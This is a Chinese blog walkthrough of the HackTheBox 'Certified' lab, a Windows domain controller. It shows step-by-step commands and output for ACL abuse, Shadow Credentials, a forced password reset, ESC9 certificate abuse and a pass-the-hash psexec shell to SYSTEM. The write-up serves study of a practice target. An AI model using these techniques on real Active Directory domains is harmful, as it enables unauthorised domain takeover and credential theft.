HackTheBox Certified Walkthrough

忍着龟速,跟着论坛提示,完成了HTB的Certified,发现DAC还是非常有意思的,瞬间觉得需要恶补域渗透方面的知识。

这是我写的比较详细的一篇Walkthrough,既是自己学习过程的记录,也可供刚刚接触这方面的朋友参考。

常规套路开头,扫一下端口。

└─$ nmap -sV -sC -Pn  -p- -oN port.log $IP                                                                                                                                     
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-06 13:10 CST                                                                                                             
Nmap scan report for certified.htb (10.10.11.41)                                                                                                                               
Host is up (0.14s latency).                                                                                                                                                    
Not shown: 65515 filtered tcp ports (no-response)                                                                                                                              
PORT      STATE SERVICE       VERSION                                                                                                                                          
53/tcp    open  domain        Simple DNS Plus                                                                                                                                  
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-06 12:04:49Z)                                                                                   
135/tcp   open  msrpc         Microsoft Windows RPC                                                                                                                            
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn                                                                                                                    
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)                                                 
|_ssl-date: 2024-11-06T12:06:20+00:00; +6h47m17s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-06T12:06:21+00:00; +6h47m17s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
|_ssl-date: 2024-11-06T12:06:20+00:00; +6h47m17s from scanner time.
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
|_ssl-date: 2024-11-06T12:06:21+00:00; +6h47m17s from scanner time.
9389/tcp  open  mc-nmf        .NET Message Framing
49666/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49670/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  msrpc         Microsoft Windows RPC
49701/tcp open  msrpc         Microsoft Windows RPC
49725/tcp open  msrpc         Microsoft Windows RPC
60276/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

根据HTB网站提示,给了一个初始用户名和密码,作为使用的入口。

首要任务是取得用户名。两种方法,一种是使用rpcclient,这种比较优雅。

└─$ rpcclient -U "certified.htb/judith.mader%judith09" $IP -c "enumdomusers"                                                                                                  
user:[Administrator] rid:[0x1f4]                                                                                                                                              
user:[Guest] rid:[0x1f5]                                                                                                                                                      
user:[krbtgt] rid:[0x1f6]                                                                                                                                                     
user:[judith.mader] rid:[0x44f]                                                                                                                                               
user:[management_svc] rid:[0x451]
user:[ca_operator] rid:[0x452]
user:[alexander.huges] rid:[0x641]
user:[harry.wilson] rid:[0x642]
user:[gregory.cameron] rid:[0x643]

第二种方法是rid爆破,得到的信息更全。

└─$ netexec smb $IP -u 'judith.mader' -p 'judith09' --rid-brute
SMB         10.10.11.41     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.41     445    DC01             [+] certified.htb\judith.mader:judith09 
SMB         10.10.11.41     445    DC01             498: CERTIFIED\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.41     445    DC01             500: CERTIFIED\Administrator (SidTypeUser)
SMB         10.10.11.41     445    DC01             501: CERTIFIED\Guest (SidTypeUser)
SMB         10.10.11.41     445    DC01             502: CERTIFIED\krbtgt (SidTypeUser)
SMB         10.10.11.41     445    DC01             512: CERTIFIED\Domain Admins (SidTypeGroup)
SMB         10.10.11.41     445    DC01             513: CERTIFIED\Domain Users (SidTypeGroup)
SMB         10.10.11.41     445    DC01             514: CERTIFIED\Domain Guests (SidTypeGroup)
SMB         10.10.11.41     445    DC01             515: CERTIFIED\Domain Computers (SidTypeGroup)
SMB         10.10.11.41     445    DC01             516: CERTIFIED\Domain Controllers (SidTypeGroup)
SMB         10.10.11.41     445    DC01             517: CERTIFIED\Cert Publishers (SidTypeAlias)
SMB         10.10.11.41     445    DC01             518: CERTIFIED\Schema Admins (SidTypeGroup)
SMB         10.10.11.41     445    DC01             519: CERTIFIED\Enterprise Admins (SidTypeGroup)
SMB         10.10.11.41     445    DC01             520: CERTIFIED\Group Policy Creator Owners (SidTypeGroup)
SMB         10.10.11.41     445    DC01             521: CERTIFIED\Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.41     445    DC01             522: CERTIFIED\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.10.11.41     445    DC01             525: CERTIFIED\Protected Users (SidTypeGroup)
SMB         10.10.11.41     445    DC01             526: CERTIFIED\Key Admins (SidTypeGroup)
SMB         10.10.11.41     445    DC01             527: CERTIFIED\Enterprise Key Admins (SidTypeGroup)
SMB         10.10.11.41     445    DC01             553: CERTIFIED\RAS and IAS Servers (SidTypeAlias)
SMB         10.10.11.41     445    DC01             571: CERTIFIED\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.41     445    DC01             572: CERTIFIED\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.41     445    DC01             1000: CERTIFIED\DC01$ (SidTypeUser)
SMB         10.10.11.41     445    DC01             1101: CERTIFIED\DnsAdmins (SidTypeAlias)
SMB         10.10.11.41     445    DC01             1102: CERTIFIED\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.11.41     445    DC01             1103: CERTIFIED\judith.mader (SidTypeUser)
SMB         10.10.11.41     445    DC01             1104: CERTIFIED\Management (SidTypeGroup)
SMB         10.10.11.41     445    DC01             1105: CERTIFIED\management_svc (SidTypeUser)
SMB         10.10.11.41     445    DC01             1106: CERTIFIED\ca_operator (SidTypeUser)
SMB         10.10.11.41     445    DC01             1601: CERTIFIED\alexander.huges (SidTypeUser)
SMB         10.10.11.41     445    DC01             1602: CERTIFIED\harry.wilson (SidTypeUser)
SMB         10.10.11.41     445    DC01             1603: CERTIFIED\gregory.cameron (SidTypeUser)

在一些easy级别的靶机里,会在desc信息中泄露敏感信息。这里例行检查一下,但没有任何发现,果然是medium级别,看来是别的套路。

─$ rpcclient -U  "judith.mader"  $IP -c "querydispinfo"                                
Password for [WORKGROUP\judith.mader]:
index: 0xeda RID: 0x1f4 acb: 0x00000210 Account: Administrator  Name: (null)    Desc: Built-in account for administering the computer/domain
index: 0xfec RID: 0x641 acb: 0x00000210 Account: alexander.huges        Name: Alexander Huges   Desc: (null)
index: 0xfb4 RID: 0x452 acb: 0x00000210 Account: ca_operator    Name: Operator CA       Desc: (null)
index: 0xfee RID: 0x643 acb: 0x00000210 Account: gregory.cameron        Name: Gregory Cameron   Desc: (null)
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest  Name: (null)    Desc: Built-in account for guest access to the computer/domain
index: 0xfed RID: 0x642 acb: 0x00000210 Account: harry.wilson   Name: Harry Wilson      Desc: (null)
index: 0xfb1 RID: 0x44f acb: 0x00000210 Account: judith.mader   Name: Judith Mader      Desc: (null)
index: 0xf10 RID: 0x1f6 acb: 0x00020011 Account: krbtgt Name: (null)    Desc: Key Distribution Center Service Account
index: 0xfb3 RID: 0x451 acb: 0x00000210 Account: management_svc Name: management service        Desc: (null)

查看一下smb,没有敏感目录用于登录。这种没有开ftp、smb、http和其它特殊服务的机器,看来只能从LDAP下手了。

└─$ smbmap -H $IP -u 'judith.mader' -p 'judith09'                     

[*] Detected 1 hosts serving SMB                                                                                                  
[*] Established 1 SMB connections(s) and 1 authenticated session(s)                                                      

[+] IP: 10.10.11.41:445 Name: certified.htb             Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        SYSVOL                                                  READ ONLY       Logon server share

接下来要收集bloodhound信息,这里judith.mader无法登录靶机,拿不到shell,不能通过上传SharpHound收集信息,只能通过netexec远程收集。

└─$ netexec ldap certified.htb -u  judith.mader -p judith09 --bloodhound --collection All --dns-server $IP                                                                     
SMB         10.10.11.41     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)               
LDAP        10.10.11.41     389    DC01             [+] certified.htb\judith.mader:judith09                                                                                    
LDAP        10.10.11.41     389    DC01             Resolved collection methods: session, dcom, psremote, objectprops, container, acl, trusts, group, localadmin, rdp          
[14:26:41] ERROR    Unhandled exception in computer DC01.certified.htb processing: The NETBIOS connection with the remote host timed out.                      computers.py:269
LDAP        10.10.11.41     389    DC01             Done in 00M 36S                                                                                                            
LDAP        10.10.11.41     389    DC01             Compressing output into /home/kali/.nxc/logs/DC01_XXXXXX_bloodhound.zip

有了这个zip文件后,就可以在本机使用BloodHound的GUI界面进行分析了。

如果是初次使用BloodHound GUI和neo4j,请参考https://www.kali.org/tools/bloodhound/。
zip文件解压后,包含多个.json文件,可以使用json查看工具单独查看,但不能像BloodHound那样分析节点间的关系。

下面的渗透过程大体分四个阶段。

第一阶段,将judith.mader用户添加到management组

首先来看judith.mader用户,注意到该用户拥有对Management组的WriteOwner权限,说明可以修改组成员。还可以看到,Management组对Management_svc用户具有GenericWrite的权限,这样就行成了一条攻击链。当然,这只是初始部分,攻击链的终点是Administrator。

当前的Management组成员只有management_svc一个用户。

利用WriteOwner权限,将Management组的Owner设置为judith.mader,然后

$ bloodyAD --host "10.10.11.41" -d "certified.htb" -u "judith.mader" -p "judith09" set owner Management judith.mader 
[+] Old owner S-1-5-21-729746778-2675978091-3820388244-512 is now replaced by judith.mader on Management

然后给judith.mader赋予WriteMembers权限,也就是可以修改Management组的成员。在修改前后,可以使用命令行(也可以使用BloodyHound)查看一下权限的变化。

└─$ impacket-dacledit -action 'read'  -rights 'WriteMembers' -principal 'judith.mader' -target-dn 'CN=MANAGEMENT,CN=USERS,DC=CERTIFIED,DC=HTB' 'certified.htb'/'judith.mader':'judith09'
[*] Parsing DACL
[*] Printing parsed DACL
[*] Filtering results for SID (S-1-5-21-729746778-2675978091-3820388244-1103)
[*]   ACE[3] info                
[*]     ACE Type                  : ACCESS_ALLOWED_ACE
[*]     ACE flags                 : CONTAINER_INHERIT_ACE
[*]     Access mask               : WriteOwner (0x80000)
[*]     Trustee (SID)             : judith.mader (S-1-5-21-729746778-2675978091-3820388244-1103)
└─$ impacket-dacledit -action 'write' -rights 'WriteMembers' -principal 'judith.mader' -target-dn 'CN=MANAGEMENT,CN=USERS,DC=CERTIFIED,DC=HTB' 'certified.htb'/'judith.mader':'judith09'
...
  'S-1-5-32-580': 'BUILTIN\Remote Management Users',                                                                                                                        
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] DACL backed up to dacledit-20241106-161817.bak  
[*] DACL modified successfully!

└─$ impacket-dacledit -action 'read'  -rights 'WriteMembers' -principal 'judith.mader' -target-dn 'CN=MANAGEMENT,CN=USERS,DC=CERTIFIED,DC=HTB' 'certified.htb'/'judith.mader':'judith09'
[*] Parsing DACL
[*] Printing parsed DACL
[*] Filtering results for SID (S-1-5-21-729746778-2675978091-3820388244-1103)
[*]   ACE[0] info                
[*]     ACE Type                  : ACCESS_ALLOWED_OBJECT_ACE
[*]     ACE flags                 : None
[*]     Access mask               : ReadProperty, WriteProperty
[*]     Flags                     : ACE_OBJECT_TYPE_PRESENT
[*]     Object type (GUID)        : Self-Membership (bf9679c0-0de6-11d0-a285-00aa003049e2)
[*]     Trustee (SID)             : judith.mader (S-1-5-21-729746778-2675978091-3820388244-1103)
[*]   ACE[4] info                
[*]     ACE Type                  : ACCESS_ALLOWED_ACE
[*]     ACE flags                 : CONTAINER_INHERIT_ACE
[*]     Access mask               : WriteOwner (0x80000)
[*]     Trustee (SID)             : judith.mader (S-1-5-21-729746778-2675978091-3820388244-1103)

接下来,将judith.mader用户添加至Management组。

┌──(kali㉿mykali)-[~/Downloads/pywhisker]
└─$ net rpc group addmem "Management" "judith.mader" -U "certified.htb"/"judith.mader"%"judith09" -S "DC01.certified.htb"

┌──(kali㉿mykali)-[~/Downloads/pywhisker]
└─$ net rpc group members "Management" -U "certified.htb/judith.mader%judith09" -S "DC01.certified.htb"                  
CERTIFIED\judith.mader
CERTIFIED\management_svc

此时,我们再一次下载BloodHound信息,并重新加载进BloodHound里进行查看。新增加的几条曲线,就是我们刚才修改的内容。

第二阶段,彻底控制management_svc用户

下面利用的方法叫Shadow Credential攻击。利用pywhisker,向management_svc用户添加msDs-KeyCredentialLink属性内容。

在获取高权限用户后,通过给目标用户添加Shadow Credential(msDS-KeyCredentialLink属性),结合相关攻击工具获取到.pfx私钥证书文件,之后使用.pfx文件申请目标用户的TGT,进而得到其NTLM Hash。
https://mrwq.github.io/aggregate-paper/butian/%E7%BA%A2%E9%98%9F%E5%9F%9F%E6%B8%97%E9%80%8F%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%8A%80%E6%9C%AF%EF%BC%9AShadow%20Credentials/

执行前可以看到,management_svc用户的该属性是空值。

└─$ pywhisker  -d "certified.htb" -u "judith.mader" -p 'judith09' --target "management_svc" --action "list"   
[*] Searching for the target account
[*] Target user found: CN=management service,CN=Users,DC=certified,DC=htb
[*] Attribute msDS-KeyCredentialLink is either empty or user does not have read permissions on that attribute

执行修改操作。该操作同步会在目录中生成一个pfx文件,信息里会给出pfx对应的密码。

└─$ pywhisker -d "certified.htb" -u "judith.mader" -p 'judith09' --target "management_svc" --action "add"
[*] Searching for the target account
[*] Target user found: CN=management service,CN=Users,DC=certified,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: b2855c96-4e22-d4f1-d494-46c4849a50c6
[*] Updating the msDS-KeyCredentialLink attribute of management_svc
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: RBgxyQHq.pfx
[*] Must be used with password: I3hqGmxeczDjW4TpBrc3
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools

再次查看,显示操作成功。

└─$ pywhisker  -d "certified.htb" -u "judith.mader" -p 'judith09' --target "management_svc" --action "list"
[*] Searching for the target account
[*] Target user found: CN=management service,CN=Users,DC=certified,DC=htb
[*] Listing devices for management_svc
[*] DeviceID: b2855c96-4e22-d4f1-d494-46c4849a50c6 | Creation Time (UTC): 2024-11-07 07:23:30.440907

获取managament_svc的TGT。

└─$ gettgtpkinit.py certified.htb/management_svc -cert-pfx RBgxyQHq.pfx -pfx-pass 'I3hqGmxeczDjW4TpBrc3' management_svc.ccache
2024-11-06 18:27:22,615 minikerberos INFO     Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2024-11-06 18:27:22,625 minikerberos INFO     Requesting TGT
INFO:minikerberos:Requesting TGT
2024-11-06 11:39:38,959 minikerberos INFO     AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2024-11-06 11:39:38,959 minikerberos INFO     59e97faba44788d88287a39c071afe9ef34a4d71de833307cba7ffc06462a3ee
INFO:minikerberos:59e97faba44788d88287a39c071afe9ef34a4d71de833307cba7ffc06462a3ee
2024-11-06 11:39:38,961 minikerberos INFO     Saved TGT to file
INFO:minikerberos:Saved TGT to file

最后,获取management_svc的NT Hash。

└─$ export KRB5CCNAME=man_svc.ccache
└─$ getnthash.py certified.htb/management_svc -key 59e97faba44788d88287a39c071afe9ef34a4d71de833307cba7ffc06462a3ee
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Using TGT from cache
/opt/getnthash.py:144: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow()
/opt/getnthash.py:192: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting ticket to self with PAC
Recovered NT Hash
<management_svc hash>

注意,以上几条命令,对时间同步要求非常高。这里有个坑,就是我们用的是北京时间,而HTB用的是UTC时间,必须更改时区为UTC,然后停止本机的时间更新服务(如果你的机器开启了的话,时间同步服务有ntp,也有chrony等),再与HTB的机器进行同步。

└─$ sudo systemctl disable chrony
Synchronizing state of chrony.service with SysV service script with /usr/lib/systemd/systemd-sysv-install.
Executing: /usr/lib/systemd/systemd-sysv-install disable chrony

└─$ sudo ntpdate -u 10.10.11.41
2024-11-06 17:03:32.282248 (+0000) +24466.087108 +/- 0.149565 10.10.11.41 s1 no-leap
CLOCK: time stepped by 24466.087108

至此,我们已经完全控制了management_svc用户。

第三阶段,控制ca_operator用户

查看BloodHound,发现management_svc用户对ca_operator用户有GenericAll权限。

可以利用management_svc账户修改ca_operator用户的密码。

└─$ pth-net rpc password "ca_operator" "pass1234" -U "certified.htb"/"management_svc"%"<management_svc hash>":"<management_svc hash>" -S "DC01.certified.htb"
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...

验证一下是否修改成功。

└─$ netexec smb $IP -u 'ca_operator' -p 'pass1234'  
SMB         10.10.11.41     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.41     445    DC01             [+] certified.htb\ca_operator:pass1234

第四阶段,利用ESC9攻击方法提权到Administrator

关于ESC9,参考https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-gui-new-authentication-and-request-methods-and-more-7237d88061f7

为了验证是否具备利用ESC9的条件,首先将靶机的Certificate Templages相关信息下载到本机。

└─$ certipy find -u judith.mader@certified.htb -p judith09 -dc-ip $IP
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'certified-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'certified-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'certified-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'certified-DC01-CA'
[*] Saved BloodHound data to '20241107174513_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[*] Saved text output to '20241107174513_Certipy.txt'
[*] Saved JSON output to '20241107174513_Certipy.json

用你喜欢的工具,打开生成的20241107174513_Certipy.json文件,如图,在Certificate Templates->CertifiedAuthentication->Enrollment Flag下具备NoSecurityExtension。这是重要条件。

下面要修改ca_operator的UPN。先看一下当前的情况,显示是ca_operator@certified.htb。

└─$ ldapsearch -x -H ldap://$IP -D "judith.mader@certified.htb" -w "judith09" -b "DC=certified,DC=htb" "(sAMAccountName=ca_operator)" userPrincipalName
# extended LDIF
#
# LDAPv3
# base <DC=certified,DC=htb> with scope subtree
# filter: (sAMAccountName=ca_operator)
# requesting: userPrincipalName 
#

# operator ca, Users, certified.htb
dn: CN=operator ca,CN=Users,DC=certified,DC=htb
userPrincipalName: ca_operator@certified.htb

# numReferences: 

我们进行修改,将ca_operator的upn改为Administrator。

└─$ certipy account update -username management_svc@certified.htb -hashes <management_svc hash> -user ca_operator -upn Administrator
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Updating user 'ca_operator':
    userPrincipalName                   : Administrator
[*] Successfully updated 'ca_operator'

查看一下更新后的ca_operator的UPN。

└─$ ldapsearch -x -H ldap://$IP -D "judith.mader@certified.htb" -w "judith09" -b "DC=certified,DC=htb" "(sAMAccountName=ca_operator)" userPrincipalName                       

# operator ca, Users, certified.htb
dn: CN=operator ca,CN=Users,DC=certified,DC=htb
userPrincipalName: Administrator

为啥要改这个UPN,一会儿就知道了。下面,我们可以利用ca_operator用户取得admnistrator的pfx文件。

└─$ certipy req -username ca_operator@certified.htb -p pass1234 -ca certified-DC01-CA -template CertifiedAuthentication -debug       
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[+] Trying to resolve 'CERTIFIED.HTB' at '10.0.2.3'
[+] Resolved 'CERTIFIED.HTB' from cache: 10.10.11.41
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.10.11.41[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.10.11.41[\pipe\cert]
[*] Successfully requested certificate
[*] Request ID is 7
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx

利用administrator.pfx文件取得administrator的hash。刚才说到,如果不改UPN,则这里得到的是ca_operator的hash。

└─$ certipy auth -pfx administrator.pfx -domain certified.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@certified.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@certified.htb': aad3b435b51404eeaad3b435b51404ee:<root hash>

最后,就是利用administrator的hash进入shell,取得root flag。

└─$ impacket-psexec administrator@$IP -hashes :<root hash>
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Requesting shares on 10.10.11.41.....
[*] Found writable share ADMIN$
[*] Uploading file kcWxAXhj.exe
[*] Opening SVCManager on 10.10.11.41.....
[*] Creating service EZkb on 10.10.11.41.....
[*] Starting service EZkb.....
[!] Press help for extra shell commands
heMicrosoft Windows [Version 10.0.17763.6414]
lp(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami /priv
'helpwhoami' is not recognized as an internal or external command,
operable program or batch file.

C:\Windows\system32> whoami
nt authority\system

感想:windowds系统域渗透确实博大精深,需要补充很多基础知识,有时间慢慢学吧!

主要参考的文章:https://breachforums.st/Thread-Certified-HTB-Medium

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注